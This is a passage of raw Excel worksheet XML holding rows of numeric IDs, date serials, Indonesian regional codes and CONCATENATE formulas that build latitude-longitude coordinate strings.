      <c r="P4019">
        <v>64</v>
      </c>
      <c r="Q4019" t="s">
        <v>13544</v>
      </c>
      <c r="R4019" t="s">
        <v>13545</v>
      </c>
      <c r="S4019" t="s">
        <v>13546</v>
      </c>
      <c r="T4019" t="s">
        <v>1308</v>
      </c>
      <c r="U4019" s="5">
        <v>11747389913</v>
      </c>
      <c r="V4019" s="5" t="s">
        <v>18084</v>
      </c>
      <c r="W4019" s="5">
        <v>13396685</v>
      </c>
      <c r="X4019" t="s">
        <v>21816</v>
      </c>
      <c r="Y4019" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.13396685,117.47389913</v>
      </c>
    </row>
    <row r="4020" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4020">
        <v>298922</v>
      </c>
      <c r="B4020" s="1">
        <v>44502</v>
      </c>
      <c r="C4020" t="s">
        <v>13547</v>
      </c>
      <c r="D4020" t="s">
        <v>22</v>
      </c>
      <c r="E4020" t="s">
        <v>23</v>
      </c>
      <c r="F4020" t="s">
        <v>13548</v>
      </c>
      <c r="G4020" t="s">
        <v>13549</v>
      </c>
      <c r="H4020" t="s">
        <v>7978</v>
      </c>
      <c r="I4020" t="s">
        <v>7979</v>
      </c>
      <c r="J4020" t="s">
        <v>2627</v>
      </c>
      <c r="L4020" t="s">
        <v>13550</v>
      </c>
      <c r="M4020">
        <v>3203190014</v>
      </c>
      <c r="N4020">
        <v>3203190</v>
      </c>
      <c r="O4020">
        <v>3203</v>
      </c>
      <c r="P4020">
        <v>32</v>
      </c>
      <c r="Q4020" t="s">
        <v>8533</v>
      </c>
      <c r="R4020" t="s">
        <v>8511</v>
      </c>
      <c r="S4020" t="s">
        <v>8512</v>
      </c>
      <c r="T4020" t="s">
        <v>42</v>
      </c>
      <c r="U4020" s="5">
        <v>10717819703</v>
      </c>
      <c r="V4020" s="5" t="s">
        <v>18085</v>
      </c>
      <c r="W4020" s="5">
        <v>-680038212</v>
      </c>
      <c r="X4020" t="s">
        <v>21817</v>
      </c>
      <c r="Y4020" t="str">
        <f t="shared" si="62"/>
        <v>-6.80038212,107.17819703</v>
      </c>
    </row>
    <row r="4021" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4021">
        <v>298923</v>
      </c>
      <c r="B4021" s="1">
        <v>44502</v>
      </c>
      <c r="C4021" t="s">
        <v>13551</v>
      </c>
      <c r="D4021" t="s">
        <v>22</v>
      </c>
      <c r="E4021" t="s">
        <v>23</v>
      </c>
      <c r="F4021" t="s">
        <v>13552</v>
      </c>
      <c r="G4021" t="s">
        <v>13553</v>
      </c>
      <c r="H4021" t="s">
        <v>7978</v>
      </c>
      <c r="I4021" t="s">
        <v>7979</v>
      </c>
      <c r="J4021" t="s">
        <v>2627</v>
      </c>
      <c r="L4021" t="s">
        <v>13554</v>
      </c>
      <c r="M4021">
        <v>3203180007</v>
      </c>
      <c r="N4021">
        <v>3203180</v>
      </c>
      <c r="O4021">
        <v>3203</v>
      </c>
      <c r="P4021">
        <v>32</v>
      </c>
      <c r="Q4021" t="s">
        <v>13555</v>
      </c>
      <c r="R4021" t="s">
        <v>13556</v>
      </c>
      <c r="S4021" t="s">
        <v>8512</v>
      </c>
      <c r="T4021" t="s">
        <v>42</v>
      </c>
      <c r="U4021" s="5">
        <v>10720374141</v>
      </c>
      <c r="V4021" s="5" t="s">
        <v>18086</v>
      </c>
      <c r="W4021" s="5">
        <v>-676865649</v>
      </c>
      <c r="X4021" t="s">
        <v>21818</v>
      </c>
      <c r="Y4021" t="str">
        <f t="shared" si="62"/>
        <v>-6.76865649,107.20374141</v>
      </c>
    </row>
    <row r="4022" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4022">
        <v>298986</v>
      </c>
      <c r="B4022" s="1">
        <v>44509</v>
      </c>
      <c r="C4022" t="s">
        <v>13557</v>
      </c>
      <c r="D4022" t="s">
        <v>22</v>
      </c>
      <c r="E4022" t="s">
        <v>23</v>
      </c>
      <c r="F4022" t="s">
        <v>13558</v>
      </c>
      <c r="G4022" t="s">
        <v>13559</v>
      </c>
      <c r="H4022" t="s">
        <v>7978</v>
      </c>
      <c r="I4022" t="s">
        <v>7979</v>
      </c>
      <c r="J4022" t="s">
        <v>2627</v>
      </c>
      <c r="M4022">
        <v>3203200008</v>
      </c>
      <c r="N4022">
        <v>3203200</v>
      </c>
      <c r="O4022">
        <v>3203</v>
      </c>
      <c r="P4022">
        <v>32</v>
      </c>
      <c r="Q4022" t="s">
        <v>13560</v>
      </c>
      <c r="R4022" t="s">
        <v>8512</v>
      </c>
      <c r="S4022" t="s">
        <v>8512</v>
      </c>
      <c r="T4022" t="s">
        <v>42</v>
      </c>
      <c r="U4022" s="5">
        <v>10713679855</v>
      </c>
      <c r="V4022" s="5" t="s">
        <v>18087</v>
      </c>
      <c r="W4022" s="5">
        <v>-682589210</v>
      </c>
      <c r="X4022" t="s">
        <v>21819</v>
      </c>
      <c r="Y4022" t="str">
        <f t="shared" si="62"/>
        <v>-6.82589210,107.13679855</v>
      </c>
    </row>
    <row r="4023" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4023">
        <v>298964</v>
      </c>
      <c r="B4023" s="1">
        <v>44507</v>
      </c>
      <c r="C4023" t="s">
        <v>13561</v>
      </c>
      <c r="D4023" t="s">
        <v>22</v>
      </c>
      <c r="E4023" t="s">
        <v>23</v>
      </c>
      <c r="F4023" t="s">
        <v>13562</v>
      </c>
      <c r="G4023" t="s">
        <v>13563</v>
      </c>
      <c r="H4023" t="s">
        <v>7978</v>
      </c>
      <c r="I4023" t="s">
        <v>7983</v>
      </c>
      <c r="J4023" t="s">
        <v>2627</v>
      </c>
      <c r="M4023">
        <v>3203120008</v>
      </c>
      <c r="N4023">
        <v>3203120</v>
      </c>
      <c r="O4023">
        <v>3203</v>
      </c>
      <c r="P4023">
        <v>32</v>
      </c>
      <c r="Q4023" t="s">
        <v>8262</v>
      </c>
      <c r="R4023" t="s">
        <v>8421</v>
      </c>
      <c r="S4023" t="s">
        <v>8512</v>
      </c>
      <c r="T4023" t="s">
        <v>42</v>
      </c>
      <c r="U4023" s="5">
        <v>10713997159</v>
      </c>
      <c r="V4023" s="5" t="s">
        <v>18088</v>
      </c>
      <c r="W4023" s="5">
        <v>-695204525</v>
      </c>
      <c r="X4023" t="s">
        <v>21820</v>
      </c>
      <c r="Y4023" t="str">
        <f t="shared" si="62"/>
        <v>-6.95204525,107.13997159</v>
      </c>
    </row>
    <row r="4024" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4024">
        <v>298920</v>
      </c>
      <c r="B4024" s="1">
        <v>44502</v>
      </c>
      <c r="C4024" t="s">
        <v>13564</v>
      </c>
      <c r="D4024" t="s">
        <v>22</v>
      </c>
      <c r="E4024" t="s">
        <v>23</v>
      </c>
      <c r="F4024" t="s">
        <v>13565</v>
      </c>
      <c r="G4024" t="s">
        <v>13566</v>
      </c>
      <c r="H4024" t="s">
        <v>26</v>
      </c>
      <c r="I4024" t="s">
        <v>11273</v>
      </c>
      <c r="J4024" t="s">
        <v>2627</v>
      </c>
      <c r="M4024">
        <v>3203200008</v>
      </c>
      <c r="N4024">
        <v>3203200</v>
      </c>
      <c r="O4024">
        <v>3203</v>
      </c>
      <c r="P4024">
        <v>32</v>
      </c>
      <c r="Q4024" t="s">
        <v>13560</v>
      </c>
      <c r="R4024" t="s">
        <v>8512</v>
      </c>
      <c r="S4024" t="s">
        <v>8512</v>
      </c>
      <c r="T4024" t="s">
        <v>42</v>
      </c>
      <c r="U4024" s="5">
        <v>10713364047</v>
      </c>
      <c r="V4024" s="5" t="s">
        <v>18089</v>
      </c>
      <c r="W4024" s="5">
        <v>-682997488</v>
      </c>
      <c r="X4024" t="s">
        <v>21821</v>
      </c>
      <c r="Y4024" t="str">
        <f t="shared" si="62"/>
        <v>-6.82997488,107.13364047</v>
      </c>
    </row>
    <row r="4025" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4025">
        <v>298988</v>
      </c>
      <c r="B4025" s="1">
        <v>44510</v>
      </c>
      <c r="C4025" t="s">
        <v>13567</v>
      </c>
      <c r="D4025" t="s">
        <v>22</v>
      </c>
      <c r="E4025" t="s">
        <v>23</v>
      </c>
      <c r="F4025" t="s">
        <v>13568</v>
      </c>
      <c r="G4025" t="s">
        <v>13569</v>
      </c>
      <c r="H4025" t="s">
        <v>26</v>
      </c>
      <c r="I4025" t="s">
        <v>788</v>
      </c>
      <c r="J4025" t="s">
        <v>7399</v>
      </c>
      <c r="L4025" t="s">
        <v>13570</v>
      </c>
      <c r="M4025">
        <v>1473020009</v>
      </c>
      <c r="N4025">
        <v>1473020</v>
      </c>
      <c r="O4025">
        <v>1473</v>
      </c>
      <c r="P4025">
        <v>14</v>
      </c>
      <c r="Q4025" t="s">
        <v>13571</v>
      </c>
      <c r="R4025" t="s">
        <v>8335</v>
      </c>
      <c r="S4025" t="s">
        <v>7939</v>
      </c>
      <c r="T4025" t="s">
        <v>7404</v>
      </c>
      <c r="U4025" s="5">
        <v>10142680049</v>
      </c>
      <c r="V4025" s="5" t="s">
        <v>18090</v>
      </c>
      <c r="W4025" s="5">
        <v>167589038</v>
      </c>
      <c r="X4025" t="s">
        <v>21822</v>
      </c>
      <c r="Y4025" t="str">
        <f t="shared" si="62"/>
        <v>1.67589038,101.42680049</v>
      </c>
    </row>
    <row r="4026" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4026">
        <v>299009</v>
      </c>
      <c r="B4026" s="1">
        <v>44513</v>
      </c>
      <c r="C4026" t="s">
        <v>13572</v>
      </c>
      <c r="D4026" t="s">
        <v>22</v>
      </c>
      <c r="E4026" t="s">
        <v>23</v>
      </c>
      <c r="F4026" t="s">
        <v>13573</v>
      </c>
      <c r="H4026" t="s">
        <v>26</v>
      </c>
      <c r="I4026" t="s">
        <v>72</v>
      </c>
      <c r="J4026" t="s">
        <v>2627</v>
      </c>
      <c r="L4026" t="s">
        <v>13574</v>
      </c>
      <c r="M4026">
        <v>3276040012</v>
      </c>
      <c r="N4026">
        <v>3276040</v>
      </c>
      <c r="O4026">
        <v>3276</v>
      </c>
      <c r="P4026">
        <v>32</v>
      </c>
      <c r="Q4026" t="s">
        <v>6553</v>
      </c>
      <c r="R4026" t="s">
        <v>1821</v>
      </c>
      <c r="S4026" t="s">
        <v>185</v>
      </c>
      <c r="T4026" t="s">
        <v>42</v>
      </c>
      <c r="U4026" s="5">
        <v>10684796535</v>
      </c>
      <c r="V4026" s="5" t="s">
        <v>18091</v>
      </c>
      <c r="W4026" s="5">
        <v>-635752214</v>
      </c>
      <c r="X4026" t="s">
        <v>21823</v>
      </c>
      <c r="Y4026" t="str">
        <f t="shared" si="62"/>
        <v>-6.35752214,106.84796535</v>
      </c>
    </row>
    <row r="4027" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4027">
        <v>298955</v>
      </c>
      <c r="B4027" s="1">
        <v>44507</v>
      </c>
      <c r="C4027" t="s">
        <v>13575</v>
      </c>
      <c r="D4027" t="s">
        <v>22</v>
      </c>
      <c r="E4027" t="s">
        <v>23</v>
      </c>
      <c r="F4027" t="s">
        <v>13576</v>
      </c>
      <c r="G4027" t="s">
        <v>13577</v>
      </c>
      <c r="H4027" t="s">
        <v>26</v>
      </c>
      <c r="I4027" t="s">
        <v>974</v>
      </c>
      <c r="J4027" t="s">
        <v>2627</v>
      </c>
      <c r="M4027">
        <v>3276020008</v>
      </c>
      <c r="N4027">
        <v>3276020</v>
      </c>
      <c r="O4027">
        <v>3276</v>
      </c>
      <c r="P4027">
        <v>32</v>
      </c>
      <c r="Q4027" t="s">
        <v>13578</v>
      </c>
      <c r="R4027" t="s">
        <v>8026</v>
      </c>
      <c r="S4027" t="s">
        <v>185</v>
      </c>
      <c r="T4027" t="s">
        <v>42</v>
      </c>
      <c r="U4027" s="5">
        <v>10680172416</v>
      </c>
      <c r="V4027" s="5" t="s">
        <v>18092</v>
      </c>
      <c r="W4027" s="5">
        <v>-638765795</v>
      </c>
      <c r="X4027" t="s">
        <v>21824</v>
      </c>
      <c r="Y4027" t="str">
        <f t="shared" si="62"/>
        <v>-6.38765795,106.80172416</v>
      </c>
    </row>
    <row r="4028" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4028">
        <v>298934</v>
      </c>
      <c r="B4028" s="1">
        <v>44505</v>
      </c>
      <c r="C4028" t="s">
        <v>13579</v>
      </c>
      <c r="D4028" t="s">
        <v>22</v>
      </c>
      <c r="E4028" t="s">
        <v>23</v>
      </c>
      <c r="F4028" t="s">
        <v>13580</v>
      </c>
      <c r="G4028" t="s">
        <v>13581</v>
      </c>
      <c r="H4028" t="s">
        <v>26</v>
      </c>
      <c r="I4028" t="s">
        <v>2196</v>
      </c>
      <c r="J4028" t="s">
        <v>6498</v>
      </c>
      <c r="L4028" t="s">
        <v>13582</v>
      </c>
      <c r="M4028">
        <v>7502071004</v>
      </c>
      <c r="N4028">
        <v>7502071</v>
      </c>
      <c r="O4028">
        <v>7502</v>
      </c>
      <c r="P4028">
        <v>75</v>
      </c>
      <c r="Q4028" t="s">
        <v>13583</v>
      </c>
      <c r="R4028" t="s">
        <v>13584</v>
      </c>
      <c r="S4028" t="s">
        <v>6501</v>
      </c>
      <c r="T4028" t="s">
        <v>6501</v>
      </c>
      <c r="U4028" s="5">
        <v>12294588447</v>
      </c>
      <c r="V4028" s="5" t="s">
        <v>18093</v>
      </c>
      <c r="W4028" s="5">
        <v>62130545</v>
      </c>
      <c r="X4028" t="s">
        <v>21825</v>
      </c>
      <c r="Y4028" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.62130545,122.94588447</v>
      </c>
    </row>
    <row r="4029" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4029">
        <v>299018</v>
      </c>
      <c r="B4029" s="1">
        <v>44518</v>
      </c>
      <c r="C4029" t="s">
        <v>13585</v>
      </c>
      <c r="D4029" t="s">
        <v>22</v>
      </c>
      <c r="E4029" t="s">
        <v>23</v>
      </c>
      <c r="F4029" t="s">
        <v>13586</v>
      </c>
      <c r="H4029" t="s">
        <v>26</v>
      </c>
      <c r="I4029" t="s">
        <v>277</v>
      </c>
      <c r="J4029" t="s">
        <v>13587</v>
      </c>
      <c r="L4029" t="s">
        <v>13588</v>
      </c>
      <c r="M4029">
        <v>8205060002</v>
      </c>
      <c r="N4029">
        <v>8205060</v>
      </c>
      <c r="O4029">
        <v>8205</v>
      </c>
      <c r="P4029">
        <v>82</v>
      </c>
      <c r="Q4029" t="s">
        <v>13589</v>
      </c>
      <c r="R4029" t="s">
        <v>13590</v>
      </c>
      <c r="S4029" t="s">
        <v>13591</v>
      </c>
      <c r="T4029" t="s">
        <v>13592</v>
      </c>
      <c r="U4029" s="5">
        <v>12776099682</v>
      </c>
      <c r="V4029" s="5" t="s">
        <v>18094</v>
      </c>
      <c r="W4029" s="5">
        <v>198079218</v>
      </c>
      <c r="X4029" t="s">
        <v>21826</v>
      </c>
      <c r="Y4029" t="str">
        <f t="shared" si="62"/>
        <v>1.98079218,127.76099682</v>
      </c>
    </row>
    <row r="4030" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4030">
        <v>299136</v>
      </c>
      <c r="B4030" s="1">
        <v>44528</v>
      </c>
      <c r="C4030" t="s">
        <v>13593</v>
      </c>
      <c r="D4030" t="s">
        <v>22</v>
      </c>
      <c r="E4030" t="s">
        <v>23</v>
      </c>
      <c r="F4030" t="s">
        <v>13594</v>
      </c>
      <c r="G4030" t="s">
        <v>13595</v>
      </c>
      <c r="H4030" t="s">
        <v>26</v>
      </c>
      <c r="I4030" t="s">
        <v>137</v>
      </c>
      <c r="J4030" t="s">
        <v>6509</v>
      </c>
      <c r="L4030" t="s">
        <v>13596</v>
      </c>
      <c r="M4030">
        <v>6307050007</v>
      </c>
      <c r="N4030">
        <v>6307050</v>
      </c>
      <c r="O4030">
        <v>6307</v>
      </c>
      <c r="P4030">
        <v>63</v>
      </c>
      <c r="Q4030" t="s">
        <v>8823</v>
      </c>
      <c r="R4030" t="s">
        <v>8817</v>
      </c>
      <c r="S4030" t="s">
        <v>8818</v>
      </c>
      <c r="T4030" t="s">
        <v>6513</v>
      </c>
      <c r="U4030" s="5">
        <v>11538494924</v>
      </c>
      <c r="V4030" s="5" t="s">
        <v>18095</v>
      </c>
      <c r="W4030" s="5">
        <v>-258537983</v>
      </c>
      <c r="X4030" t="s">
        <v>21827</v>
      </c>
      <c r="Y4030" t="str">
        <f t="shared" si="62"/>
        <v>-2.58537983,115.38494924</v>
      </c>
    </row>
    <row r="4031" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4031">
        <v>299137</v>
      </c>
      <c r="B4031" s="1">
        <v>44528</v>
      </c>
      <c r="C4031" t="s">
        <v>13597</v>
      </c>
      <c r="D4031" t="s">
        <v>22</v>
      </c>
      <c r="E4031" t="s">
        <v>23</v>
      </c>
      <c r="F4031" t="s">
        <v>13598</v>
      </c>
      <c r="G4031" t="s">
        <v>13599</v>
      </c>
      <c r="H4031" t="s">
        <v>26</v>
      </c>
      <c r="I4031" t="s">
        <v>27</v>
      </c>
      <c r="J4031" t="s">
        <v>6509</v>
      </c>
      <c r="L4031" t="s">
        <v>13600</v>
      </c>
      <c r="M4031">
        <v>6307050004</v>
      </c>
      <c r="N4031">
        <v>6307050</v>
      </c>
      <c r="O4031">
        <v>6307</v>
      </c>
      <c r="P4031">
        <v>63</v>
      </c>
      <c r="Q4031" t="s">
        <v>13601</v>
      </c>
      <c r="R4031" t="s">
        <v>8817</v>
      </c>
      <c r="S4031" t="s">
        <v>8818</v>
      </c>
      <c r="T4031" t="s">
        <v>6513</v>
      </c>
      <c r="U4031" s="5">
        <v>11536331177</v>
      </c>
      <c r="V4031" s="5" t="s">
        <v>18096</v>
      </c>
      <c r="W4031" s="5">
        <v>-259394681</v>
      </c>
      <c r="X4031" t="s">
        <v>21828</v>
      </c>
      <c r="Y4031" t="str">
        <f t="shared" si="62"/>
        <v>-2.59394681,115.36331177</v>
      </c>
    </row>
    <row r="4032" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4032">
        <v>299121</v>
      </c>
      <c r="B4032" s="1">
        <v>44528</v>
      </c>
      <c r="C4032" t="s">
        <v>13602</v>
      </c>
      <c r="D4032" t="s">
        <v>22</v>
      </c>
      <c r="E4032" t="s">
        <v>23</v>
      </c>
      <c r="F4032" t="s">
        <v>13603</v>
      </c>
      <c r="G4032" t="s">
        <v>13604</v>
      </c>
      <c r="H4032" t="s">
        <v>26</v>
      </c>
      <c r="I4032" t="s">
        <v>473</v>
      </c>
      <c r="J4032" t="s">
        <v>6509</v>
      </c>
      <c r="L4032" t="s">
        <v>13605</v>
      </c>
      <c r="M4032">
        <v>6307050007</v>
      </c>
      <c r="N4032">
        <v>6307050</v>
      </c>
      <c r="O4032">
        <v>6307</v>
      </c>
      <c r="P4032">
        <v>63</v>
      </c>
      <c r="Q4032" t="s">
        <v>8823</v>
      </c>
      <c r="R4032" t="s">
        <v>8817</v>
      </c>
      <c r="S4032" t="s">
        <v>8818</v>
      </c>
      <c r="T4032" t="s">
        <v>6513</v>
      </c>
      <c r="U4032" s="5">
        <v>11538358927</v>
      </c>
      <c r="V4032" s="5" t="s">
        <v>18097</v>
      </c>
      <c r="W4032" s="5">
        <v>-258558151</v>
      </c>
      <c r="X4032" t="s">
        <v>21829</v>
      </c>
      <c r="Y4032" t="str">
        <f t="shared" si="62"/>
        <v>-2.58558151,115.38358927</v>
      </c>
    </row>
    <row r="4033" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4033">
        <v>299140</v>
      </c>
      <c r="B4033" s="1">
        <v>44529</v>
      </c>
      <c r="C4033" t="s">
        <v>13606</v>
      </c>
      <c r="D4033" t="s">
        <v>22</v>
      </c>
      <c r="E4033" t="s">
        <v>23</v>
      </c>
      <c r="F4033" t="s">
        <v>13607</v>
      </c>
      <c r="G4033" t="s">
        <v>13608</v>
      </c>
      <c r="H4033" t="s">
        <v>26</v>
      </c>
      <c r="I4033" t="s">
        <v>5752</v>
      </c>
      <c r="J4033" t="s">
        <v>6509</v>
      </c>
      <c r="L4033" t="s">
        <v>13609</v>
      </c>
      <c r="M4033">
        <v>6307050007</v>
      </c>
      <c r="N4033">
        <v>6307050</v>
      </c>
      <c r="O4033">
        <v>6307</v>
      </c>
      <c r="P4033">
        <v>63</v>
      </c>
      <c r="Q4033" t="s">
        <v>8823</v>
      </c>
      <c r="R4033" t="s">
        <v>8817</v>
      </c>
      <c r="S4033" t="s">
        <v>8818</v>
      </c>
      <c r="T4033" t="s">
        <v>6513</v>
      </c>
      <c r="U4033" s="5">
        <v>11538358927</v>
      </c>
      <c r="V4033" s="5" t="s">
        <v>18097</v>
      </c>
      <c r="W4033" s="5">
        <v>-258558151</v>
      </c>
      <c r="X4033" t="s">
        <v>21829</v>
      </c>
      <c r="Y4033" t="str">
        <f t="shared" si="62"/>
        <v>-2.58558151,115.38358927</v>
      </c>
    </row>
    <row r="4034" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4034">
        <v>299122</v>
      </c>
      <c r="B4034" s="1">
        <v>44528</v>
      </c>
      <c r="C4034" t="s">
        <v>13610</v>
      </c>
      <c r="D4034" t="s">
        <v>22</v>
      </c>
      <c r="E4034" t="s">
        <v>23</v>
      </c>
      <c r="F4034" t="s">
        <v>13611</v>
      </c>
      <c r="G4034" t="s">
        <v>13612</v>
      </c>
      <c r="H4034" t="s">
        <v>26</v>
      </c>
      <c r="I4034" t="s">
        <v>10636</v>
      </c>
      <c r="J4034" t="s">
        <v>6509</v>
      </c>
      <c r="L4034" t="s">
        <v>13613</v>
      </c>
      <c r="M4034">
        <v>6307050007</v>
      </c>
      <c r="N4034">
        <v>6307050</v>
      </c>
      <c r="O4034">
        <v>6307</v>
      </c>
      <c r="P4034">
        <v>63</v>
      </c>
      <c r="Q4034" t="s">
        <v>8823</v>
      </c>
      <c r="R4034" t="s">
        <v>8817</v>
      </c>
      <c r="S4034" t="s">
        <v>8818</v>
      </c>
      <c r="T4034" t="s">
        <v>6513</v>
      </c>
      <c r="U4034" s="5">
        <v>11538358927</v>
      </c>
      <c r="V4034" s="5" t="s">
        <v>18097</v>
      </c>
      <c r="W4034" s="5">
        <v>-258558151</v>
      </c>
      <c r="X4034" t="s">
        <v>21829</v>
      </c>
      <c r="Y4034" t="str">
        <f t="shared" si="62"/>
        <v>-2.58558151,115.38358927</v>
      </c>
    </row>
    <row r="4035" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4035">
        <v>299019</v>
      </c>
      <c r="B4035" s="1">
        <v>44519</v>
      </c>
      <c r="C4035" t="s">
        <v>13614</v>
      </c>
      <c r="D4035" t="s">
        <v>22</v>
      </c>
      <c r="E4035" t="s">
        <v>23</v>
      </c>
      <c r="F4035" t="s">
        <v>13615</v>
      </c>
      <c r="G4035" t="s">
        <v>13616</v>
      </c>
      <c r="H4035" t="s">
        <v>26</v>
      </c>
      <c r="I4035" t="s">
        <v>1683</v>
      </c>
      <c r="J4035" t="s">
        <v>6509</v>
      </c>
      <c r="L4035" t="s">
        <v>13617</v>
      </c>
      <c r="M4035">
        <v>6307020013</v>
      </c>
      <c r="N4035">
        <v>6307020</v>
      </c>
      <c r="O4035">
        <v>6307</v>
      </c>
      <c r="P4035">
        <v>63</v>
      </c>
      <c r="Q4035" t="s">
        <v>13618</v>
      </c>
      <c r="R4035" t="s">
        <v>13619</v>
      </c>
      <c r="S4035" t="s">
        <v>8818</v>
      </c>
      <c r="T4035" t="s">
        <v>6513</v>
      </c>
      <c r="U4035" s="5">
        <v>11542929947</v>
      </c>
      <c r="V4035" s="5" t="s">
        <v>18098</v>
      </c>
      <c r="W4035" s="5">
        <v>-261875837</v>
      </c>
      <c r="X4035" t="s">
        <v>21830</v>
      </c>
      <c r="Y4035" t="str">
        <f t="shared" ref="Y4035:Y4098" si="63">CONCATENATE(X4035,",",V4035)</f>
        <v>-2.61875837,115.42929947</v>
      </c>
    </row>
    <row r="4036" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4036">
        <v>299143</v>
      </c>
      <c r="B4036" s="1">
        <v>44530</v>
      </c>
      <c r="C4036" t="s">
        <v>13620</v>
      </c>
      <c r="D4036" t="s">
        <v>22</v>
      </c>
      <c r="E4036" t="s">
        <v>23</v>
      </c>
      <c r="F4036" t="s">
        <v>13621</v>
      </c>
      <c r="G4036" t="s">
        <v>13622</v>
      </c>
      <c r="H4036" t="s">
        <v>26</v>
      </c>
      <c r="I4036" t="s">
        <v>523</v>
      </c>
      <c r="J4036" t="s">
        <v>6509</v>
      </c>
      <c r="L4036" t="s">
        <v>13623</v>
      </c>
      <c r="M4036">
        <v>6308050020</v>
      </c>
      <c r="N4036">
        <v>6308050</v>
      </c>
      <c r="O4036">
        <v>6308</v>
      </c>
      <c r="P4036">
        <v>63</v>
      </c>
      <c r="Q4036" t="s">
        <v>13624</v>
      </c>
      <c r="R4036" t="s">
        <v>13625</v>
      </c>
      <c r="S4036" t="s">
        <v>13101</v>
      </c>
      <c r="T4036" t="s">
        <v>6513</v>
      </c>
      <c r="U4036" s="5">
        <v>11525522411</v>
      </c>
      <c r="V4036" s="5" t="s">
        <v>18099</v>
      </c>
      <c r="W4036" s="5">
        <v>-241943817</v>
      </c>
      <c r="X4036" t="s">
        <v>21831</v>
      </c>
      <c r="Y4036" t="str">
        <f t="shared" si="63"/>
        <v>-2.41943817,115.25522411</v>
      </c>
    </row>
    <row r="4037" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4037">
        <v>299142</v>
      </c>
      <c r="B4037" s="1">
        <v>44530</v>
      </c>
      <c r="C4037" t="s">
        <v>13626</v>
      </c>
      <c r="D4037" t="s">
        <v>22</v>
      </c>
      <c r="E4037" t="s">
        <v>23</v>
      </c>
      <c r="F4037" t="s">
        <v>13627</v>
      </c>
      <c r="G4037" t="s">
        <v>13628</v>
      </c>
      <c r="H4037" t="s">
        <v>26</v>
      </c>
      <c r="I4037" t="s">
        <v>271</v>
      </c>
      <c r="J4037" t="s">
        <v>6509</v>
      </c>
      <c r="L4037" t="s">
        <v>13629</v>
      </c>
      <c r="M4037">
        <v>6308050020</v>
      </c>
      <c r="N4037">
        <v>6308050</v>
      </c>
      <c r="O4037">
        <v>6308</v>
      </c>
      <c r="P4037">
        <v>63</v>
      </c>
      <c r="Q4037" t="s">
        <v>13624</v>
      </c>
      <c r="R4037" t="s">
        <v>13625</v>
      </c>
      <c r="S4037" t="s">
        <v>13101</v>
      </c>
      <c r="T4037" t="s">
        <v>6513</v>
      </c>
      <c r="U4037" s="5">
        <v>11525684416</v>
      </c>
      <c r="V4037" s="5" t="s">
        <v>18100</v>
      </c>
      <c r="W4037" s="5">
        <v>-241913770</v>
      </c>
      <c r="X4037" t="s">
        <v>21832</v>
      </c>
      <c r="Y4037" t="str">
        <f t="shared" si="63"/>
        <v>-2.41913770,115.25684416</v>
      </c>
    </row>
    <row r="4038" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4038">
        <v>298973</v>
      </c>
      <c r="B4038" s="1">
        <v>44508</v>
      </c>
      <c r="C4038" t="s">
        <v>13630</v>
      </c>
      <c r="D4038" t="s">
        <v>22</v>
      </c>
      <c r="E4038" t="s">
        <v>23</v>
      </c>
      <c r="F4038" s="3" t="s">
        <v>13631</v>
      </c>
      <c r="H4038" t="s">
        <v>26</v>
      </c>
      <c r="I4038" t="s">
        <v>166</v>
      </c>
      <c r="J4038" t="s">
        <v>425</v>
      </c>
      <c r="L4038" t="s">
        <v>13632</v>
      </c>
      <c r="M4038">
        <v>3174010005</v>
      </c>
      <c r="N4038">
        <v>3174010</v>
      </c>
      <c r="O4038">
        <v>3174</v>
      </c>
      <c r="P4038">
        <v>31</v>
      </c>
      <c r="Q4038" t="s">
        <v>251</v>
      </c>
      <c r="R4038" t="s">
        <v>69</v>
      </c>
      <c r="S4038" t="s">
        <v>32</v>
      </c>
      <c r="T4038" t="s">
        <v>33</v>
      </c>
      <c r="U4038" s="5">
        <v>10675593138</v>
      </c>
      <c r="V4038" s="5" t="s">
        <v>18101</v>
      </c>
      <c r="W4038" s="5">
        <v>-618360351</v>
      </c>
      <c r="X4038" t="s">
        <v>21833</v>
      </c>
      <c r="Y4038" t="str">
        <f t="shared" si="63"/>
        <v>-6.18360351,106.75593138</v>
      </c>
    </row>
    <row r="4039" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4039">
        <v>298967</v>
      </c>
      <c r="B4039" s="1">
        <v>44507</v>
      </c>
      <c r="C4039" t="s">
        <v>13633</v>
      </c>
      <c r="D4039" t="s">
        <v>22</v>
      </c>
      <c r="E4039" t="s">
        <v>23</v>
      </c>
      <c r="F4039" t="s">
        <v>13634</v>
      </c>
      <c r="H4039" t="s">
        <v>26</v>
      </c>
      <c r="I4039" t="s">
        <v>1359</v>
      </c>
      <c r="J4039" t="s">
        <v>723</v>
      </c>
      <c r="L4039" t="s">
        <v>13635</v>
      </c>
      <c r="M4039">
        <v>3174070002</v>
      </c>
      <c r="N4039">
        <v>3174070</v>
      </c>
      <c r="O4039">
        <v>3174</v>
      </c>
      <c r="P4039">
        <v>31</v>
      </c>
      <c r="Q4039" t="s">
        <v>621</v>
      </c>
      <c r="R4039" t="s">
        <v>84</v>
      </c>
      <c r="S4039" t="s">
        <v>32</v>
      </c>
      <c r="T4039" t="s">
        <v>33</v>
      </c>
      <c r="U4039" s="5">
        <v>10674600919</v>
      </c>
      <c r="V4039" s="5" t="s">
        <v>18102</v>
      </c>
      <c r="W4039" s="5">
        <v>-616507150</v>
      </c>
      <c r="X4039" t="s">
        <v>21834</v>
      </c>
      <c r="Y4039" t="str">
